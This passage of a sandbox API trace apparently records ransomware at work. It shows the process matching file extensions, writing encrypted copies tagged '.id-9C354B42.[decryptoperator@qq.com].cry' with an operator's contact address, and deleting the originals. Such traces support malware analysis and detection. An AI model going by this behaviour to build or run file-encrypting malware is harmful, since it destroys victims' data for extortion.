Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0045.718] lstrlenW (lpString=".zip") returned 4 [0045.718] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.718] lstrlenW (lpString=".rar") returned 4 [0045.718] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.718] lstrlenW (lpString=".bz2") returned 4 [0045.718] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.718] lstrlenW (lpString=".7z") returned 3 [0045.718] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.718] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0045.718] lstrlenW (lpString=".dbf") returned 4 [0045.718] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.718] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0045.718] lstrlenW (lpString=".1cd") returned 4 [0045.718] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.718] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0045.718] lstrlenW (lpString=".jpg") returned 4 [0045.718] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.719] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0045.719] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0045.719] lstrlenW (lpString=".doc") returned 4 [0045.719] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.719] lstrlenW (lpString=".docx") returned 5 [0045.719] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.719] lstrlenW (lpString=".pdf") returned 4 [0045.719] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.719] lstrlenW (lpString=".xls") returned 4 [0045.719] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.719] lstrlenW (lpString=".xlsx") returned 5 [0045.719] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.719] lstrlenW (lpString=".ppt") returned 4 [0045.719] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.719] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0045.719] lstrlenW (lpString=".zip") returned 4 [0045.719] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.719] lstrlenW (lpString=".rar") returned 4 [0045.719] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.719] lstrlenW (lpString=".bz2") returned 4 [0045.719] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.719] lstrlenW (lpString=".7z") returned 3 [0045.719] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.719] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0045.719] lstrlenW (lpString=".dbf") returned 4 [0045.719] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.719] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0045.719] lstrlenW (lpString=".1cd") returned 4 [0045.719] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.719] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 74 [0045.719] lstrlenW (lpString=".jpg") returned 4 [0045.719] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.719] lstrcmpiW (lpString1=".PNG", lpString2=".cry") returned 1 [0045.719] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0045.719] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0045.720] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=37112) returned 1 [0045.720] CloseHandle (hObject=0x1fc) returned 1 [0045.720] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\thmbnail.png")) returned 0x20 [0045.720] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0045.720] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0045.720] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.720] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.720] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0045.720] GetLastError () returned 0x0 [0045.721] ReadFile (in: hFile=0x1fc, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x90f8, lpOverlapped=0x0) returned 1 [0046.971] WriteFile (in: hFile=0x20c, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x9100, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x9100, lpOverlapped=0x0) returned 1 [0046.972] ReadFile (in: hFile=0x1fc, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.972] WriteFile (in: hFile=0x20c, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.972] SetEndOfFile (hFile=0x20c) returned 1 [0046.973] CloseHandle (hObject=0x20c) returned 1 [0046.973] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.973] SetEndOfFile (hFile=0x1fc) returned 1 [0046.974] CloseHandle (hObject=0x1fc) returned 1 [0046.974] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0046.974] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\thmbnail.png")) returned 1 [0046.974] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0046.974] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0046.974] lstrlenW (lpString=".doc") returned 4 [0046.974] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.974] lstrlenW (lpString=".docx") returned 5 [0046.974] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.974] lstrlenW (lpString=".pdf") returned 4 [0046.974] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.974] lstrlenW (lpString=".xls") returned 4 [0046.974] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.974] lstrlenW (lpString=".xlsx") returned 5 [0046.975] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.975] lstrlenW (lpString=".ppt") returned 4 [0046.975] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.975] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0046.975] lstrlenW (lpString=".zip") returned 4 [0046.975] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.975] lstrlenW (lpString=".rar") returned 4 [0046.975] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.975] lstrlenW (lpString=".bz2") returned 4 [0046.975] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.975] lstrlenW (lpString=".7z") returned 3 [0046.975] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.975] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0046.975] lstrlenW (lpString=".dbf") returned 4 [0046.975] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.975] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0046.975] lstrlenW (lpString=".1cd") returned 4 [0046.975] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.975] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0046.975] lstrlenW (lpString=".jpg") returned 4 [0046.975] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.975] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0046.975] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0046.975] lstrlenW (lpString=".doc") returned 4 [0046.975] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.975] lstrlenW (lpString=".docx") returned 5 [0046.975] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.975] lstrlenW (lpString=".pdf") returned 4 [0046.975] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.975] lstrlenW (lpString=".xls") returned 4 [0046.975] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.975] lstrlenW (lpString=".xlsx") returned 5 [0046.975] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.975] lstrlenW (lpString=".ppt") returned 4 [0046.975] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.976] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0046.976] lstrlenW (lpString=".zip") returned 4 [0046.976] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.976] lstrlenW (lpString=".rar") returned 4 [0046.976] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.976] lstrlenW (lpString=".bz2") returned 4 [0046.976] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.976] lstrlenW (lpString=".7z") returned 3 [0046.976] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.976] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0046.976] lstrlenW (lpString=".dbf") returned 4 [0046.976] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.976] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0046.976] lstrlenW (lpString=".1cd") returned 4 [0046.976] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.976] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 73 [0046.976] lstrlenW (lpString=".jpg") returned 4 [0046.976] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.976] lstrcmpiW (lpString1=".PNG", lpString2=".cry") returned 1 [0046.976] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0046.976] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0046.977] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=19563) returned 1 [0046.977] CloseHandle (hObject=0x1fc) returned 1 [0046.977] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\thmbnail.png")) returned 0x20 [0046.977] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0046.977] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0046.977] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.977] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.977] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0047.088] GetLastError () returned 0x0 [0047.088] ReadFile (in: hFile=0x1fc, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x4c6b, lpOverlapped=0x0) returned 1 [0047.212] WriteFile (in: hFile=0x16c, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x4c70, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x4c70, lpOverlapped=0x0) returned 1 [0047.213] ReadFile (in: hFile=0x1fc, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.213] WriteFile (in: hFile=0x16c, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0047.213] SetEndOfFile (hFile=0x16c) returned 1 [0047.213] CloseHandle (hObject=0x16c) returned 1 [0047.213] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.213] SetEndOfFile (hFile=0x1fc) returned 1 [0047.214] CloseHandle (hObject=0x1fc) returned 1 [0047.214] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0047.215] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\thmbnail.png")) returned 1 [0047.215] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0047.215] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0047.215] lstrlenW (lpString=".doc") returned 4 [0047.215] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.215] lstrlenW (lpString=".docx") returned 5 [0047.215] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.215] lstrlenW (lpString=".pdf") returned 4 [0047.215] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.215] lstrlenW (lpString=".xls") returned 4 [0047.215] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.215] lstrlenW (lpString=".xlsx") returned 5 [0047.215] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.215] lstrlenW (lpString=".ppt") returned 4 [0047.215] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.215] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0047.215] lstrlenW (lpString=".zip") returned 4 [0047.215] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.215] lstrlenW (lpString=".rar") returned 4 [0047.215] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.215] lstrlenW (lpString=".bz2") returned 4 [0047.215] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.215] lstrlenW (lpString=".7z") returned 3 [0047.215] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.215] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0047.215] lstrlenW (lpString=".dbf") returned 4 [0047.215] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.215] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0047.215] lstrlenW (lpString=".1cd") returned 4 [0047.215] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.215] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0047.216] lstrlenW (lpString=".jpg") returned 4 [0047.216] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.216] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0047.216] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0047.216] lstrlenW (lpString=".doc") returned 4 [0047.216] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.216] lstrlenW (lpString=".docx") returned 5 [0047.216] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.216] lstrlenW (lpString=".pdf") returned 4 [0047.216] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.216] lstrlenW (lpString=".xls") returned 4 [0047.216] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.216] lstrlenW (lpString=".xlsx") returned 5 [0047.216] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.216] lstrlenW (lpString=".ppt") returned 4 [0047.216] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.216] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0047.216] lstrlenW (lpString=".zip") returned 4 [0047.216] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.216] lstrlenW (lpString=".rar") returned 4 [0047.216] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.216] lstrlenW (lpString=".bz2") returned 4 [0047.216] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.216] lstrlenW (lpString=".7z") returned 3 [0047.216] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.216] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0047.216] lstrlenW (lpString=".dbf") returned 4 [0047.216] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.216] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0047.216] lstrlenW (lpString=".1cd") returned 4 [0047.216] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.216] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\THMBNAIL.PNG") returned 75 [0047.216] lstrlenW (lpString=".jpg") returned 4 [0047.216] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.216] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0047.217] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0047.217] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0047.217] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=4100) returned 1 [0047.217] CloseHandle (hObject=0x1fc) returned 1 [0047.217] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\preview.gif")) returned 0x20 [0047.217] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0047.217] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0047.217] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.217] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.217] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0047.224] GetLastError () returned 0x0 [0047.225] ReadFile (in: hFile=0x1fc, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x1004, lpOverlapped=0x0) returned 1 [0047.372] WriteFile (in: hFile=0x16c, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x1010, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x1010, lpOverlapped=0x0) returned 1 [0047.767] ReadFile (in: hFile=0x1fc, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.767] WriteFile (in: hFile=0x16c, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.767] SetEndOfFile (hFile=0x16c) returned 1 [0047.768] CloseHandle (hObject=0x16c) returned 1 [0047.768] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.768] SetEndOfFile (hFile=0x1fc) returned 1 [0047.768] CloseHandle (hObject=0x1fc) returned 1 [0047.769] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0047.769] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\preview.gif")) returned 1 [0047.769] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0047.769] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\PREVIEW.GIF") returned 75 [0047.769] lstrlenW (lpString=".doc") returned 4 [0047.769] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.769] lstrlenW (lpString=".docx") returned 5 [0047.769] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.769] lstrlenW (lpString=".pdf") returned 4 [0047.769] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.769] lstrlenW (lpString=".xls") returned 4 [0047.769] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.769] lstrlenW (lpString=".xlsx") returned 5 [0047.769] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.769] lstrlenW (lpString=".ppt") returned 4 [0047.769] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.769] lstrlenW 